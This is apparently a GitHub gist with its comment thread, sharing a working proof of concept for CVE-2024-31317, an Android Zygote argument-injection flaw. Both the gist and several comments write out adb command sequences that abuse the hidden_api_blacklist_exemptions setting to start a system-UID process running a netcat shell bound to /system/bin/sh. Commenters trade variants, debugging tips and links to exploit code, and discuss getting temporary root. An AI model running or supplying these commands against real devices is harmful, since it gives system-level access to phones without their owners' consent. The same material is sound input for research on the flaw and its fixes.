CVE-2024-31317

gistfile1.txt

am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234

Tried to reproduce on my honor device - no luck... Had to use ncat instead like that:

am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
/data/local/tmp/ncat -l -e /system/bin/sh 127.0.0.1 1234;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234

interesting. I didn't think it would be able to execute from the tmp folder. By the way the su part doesn't matter that was just left from my testing.

Yeah, unfortunately my toybox built with no nc. Do you know what I need to look at the log in case of failure/success? And I suppose you executing those commands in shell simultaneously via sh script or separately one-by-one?

I didn't bother with a script since I have android 10. You would see zygote errors in logcat and/or selinux denials in dmesg

Tried to reproduce on my honor device - no luck... Had to use ncat instead like that:

am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
/data/local/tmp/ncat -l -e /system/bin/sh 127.0.0.1 1234;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234

Which ncat are you using?

@ybtag thanks for sharing this it works but I was trying to run a service using this exploit which would have some method to perform privileged functions and then return the response. This service could be then called by a custom non-privileged application during runtime achieve privilege function calls and show the result on the UI. Were able to achieve this or anything similar?

i've managed also to make this exploit work on an Android 11 and 10
is there any possibility to use this exploit to temporarily root a device? and also what directories are safe to place bin/executables since /data/local/tmp is inaccessible

@Bonveio were u able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?

@Bonveio were u able to achieve something like this https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?

from what i understand to the PoC, its impossible to initialize the exploit without the UID 2000 (shell user) which you can only achieve externally using adb (if the device is not rooted, if it is rooted i think you can run adbd on a superuser shell). but the running netcat shell server with UID 1000 privilege listening on 0.0.0.0 is accessible by any android apps on the device like Termux. Just be careful to remove the hidden_api_blacklist_exemptions before rebooting/restarting the device or else the device will occur in bootloop

@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.

@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.

This is way beyond my knowledge im sorry i might not be able to help you with that matter, but im happy if i can test the custom application you're trying to build so i can report or suggest something that might be helpful on your development

For example if I do something like this

settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"

Then Settings app crashes on opening and this command am start-foreground-service -n com.user.helloworld/.PrivilegedService; present in --invoke-with doesnt get invoked properly

Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this

settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"

But it is throwing Already Cached excpetion

java.lang.IllegalStateException: Already cached. at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148) at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374) at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144) at com.android.internal.os.WrapperInit.main(WrapperInit.java:83) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)

For anyone wondering, this is what I had to do on my Honor 10 (COL-L29): https://nmexis.me/blog/honor-10-backup.html
Its toybox does not come with netcat and @rabits's approach did not work for me because the system user cannot access the /data/local/tmp folder. So, I needed to improvise a bit by uploading my own netcat or toybox executable (both actually work fine) and using a "reverse" procedure where the system user does not open the socket at all, but rather it connects to a socket that I need to open from the outside using the custom netcat setup. May be useful for someone in the future, maybe

Thank you @ThexXTURBOXx for the update! Checked on my still-the-same VER-N49 (Android 13, 7.2.0.108(C636E1R2P2)) - and no luck... In the meanwhile I tried some different approaches (like GPU exploit from Quest 3) - but still nothing... This is surely a tough nut to crack.

@rabits I also tried out the same GPU exploit on my Honor 10, but didn't get anywhere, sadly. But it's good to know that your Honor phone is on Android 13, as this needs some additional setup, as seen here:
https://github.com/ThexXTURBOXx/CVE-2024-31317/blob/main/31317/app/src/main/java/com/fh/exp31317/MainActivity.java#L230-L241
I am guessing that my code is already rather correct also for your device, but the padding does not have the correct length(s). Feel free to experiment with that a bit, of course, and let me know if you find some padding lengths that work!
When trying out a few length combinations, keep an eye on the logcat output. Especially when it says something like "Broken pipe", you need to act upon it. I just rebooted the entire device in this case. It may be enough to force-stop the exploit app and restart it, but I am not 100% certain and have not tried it.
I also encountered other errors that seemed rather odd and were undeterministic for some reason. Most of them can be ignored, but maybe the do actually carry some important info that you can (ab)use to your benefit (by comparing with the Zygote source code)